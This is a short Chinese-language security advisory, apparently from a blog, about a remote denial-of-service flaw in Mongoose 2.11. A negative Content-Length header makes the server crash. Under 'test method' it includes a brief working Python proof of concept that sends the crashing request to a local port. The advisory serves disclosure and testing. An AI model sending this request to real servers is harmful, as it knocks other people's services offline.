Mongoose ‘Content-Length’ HTTP头远程拒绝服务漏洞

 
漏洞起因
异常条件处理失败错误
危险等级

 
影响系统
Mongoose 2.11
 
不受影响系统
 
危害
远程攻击者可以利用漏洞使应用程序崩溃。
 
攻击所需条件
攻击者必须访问Mongoose。
 
漏洞信息
Mongoose是一款简单易用的WEB服务程序。
向Mongoose发送使用负的Content-Length值的WEB请求,可使应用程序触发读访问而崩溃。
 
测试方法
import socket
host = ‘localhost’
port = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)   
s.connect((host, port))
s.send(‘GET / HTTP/1.1\r\n’
       ‘Host: ‘ + host + ‘\r\n’
       ‘Content-Length: -2147483648\r\n\r\n’)
 
厂商解决方案
目前没有详细解决方案提供:
http://mongoose.googlecode.com/files/mongoose-2.11.exe
 
漏洞提供者
John Leitch

发表评论?

0 条评论。

发表评论